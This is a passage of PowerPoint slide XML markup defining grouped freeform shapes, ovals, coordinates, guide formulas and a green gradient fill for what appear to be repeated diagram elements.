                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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2" name="Freeform 2511"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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3" name="Freeform 2512"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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" name="Oval 2513"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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" name="Oval 2514"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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" name="Oval 2515"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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7" name="Oval 2516"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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" name="Oval 2517"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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9" name="Oval 2518"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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0" name="Oval 2519"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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1" name="Oval 2520"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219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2" name="Oval 2521"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170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43" name="Group 2509"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1762356" y="2070390"/>
              <a:ext cx="1366144" cy="396408"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Freeform 2510"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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5" name="Freeform 2511"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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6" name="Freeform 2512"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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" name="Oval 2513"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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" name="Oval 2514"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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9" name="Oval 2515"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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0" name="Oval 2516"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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" name="Oval 2517"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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" name="Oval 2518"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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3" name="Oval 2519"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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4" name="Oval 2520"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219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5" name="Oval 2521"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170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56" name="Group 2509"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2606010" y="2297220"/>
              <a:ext cx="1366144" cy="396408"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="57" name="Freeform 2510"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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" name="Freeform 2511"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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" name="Freeform 2512"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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" name="Oval 2513"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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1" name="Oval 2514"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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2" name="Oval 2515"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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" name="Oval 2516"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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4" name="Oval 2517"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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5" name="Oval 2518"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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" name="Oval 2519"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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" name="Oval 2520"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219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" name="Oval 2521"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170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69" name="Group 2509"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3456008" y="2527258"/>
              <a:ext cx="1366144" cy="396408"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Freeform 2510"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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" name="Freeform 2511"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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" name="Freeform 2512"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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" name="Oval 2513"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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" name="Oval 2514"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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" name="Oval 2515"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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" name="Oval 2516"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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" name="Oval 2517"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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" name="Oval 2518"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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" name="Oval 2519"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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" name="Oval 2520"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219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" name="Oval 2521"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170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82" name="Group 1080"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="8049672" y="1233863"/>
              <a:ext cx="2063750" cy="854075"/>
              <a:chOff x="2694" y="1658"/>
              <a:chExt cx="1300" cy="538"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="83" name="Freeform 1309"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2694" y="1846"/>
                <a:ext cx="1300" cy="350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EC000"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="669900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd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84" name="Group 743"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2887" y="1658"/>
                <a:ext cx="739" cy="431"/>
                <a:chOff x="2971" y="1700"/>
                <a:chExt cx="739" cy="431"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="172" name="Freeform 662"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2993" y="1706"/>
                  <a:ext cx="450" cy="353"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3104"/>
                    <a:gd name="T1" fmla="*/ 2433 h 2433"/>
                    <a:gd name="T2" fmla="*/ 0 w 3104"/>
                    <a:gd name="T3" fmla="*/ 831 h 2433"/>
                    <a:gd name="T4" fmla="*/ 3104 w 3104"/>
                    <a:gd name="T5" fmla="*/ 0 h 2433"/>
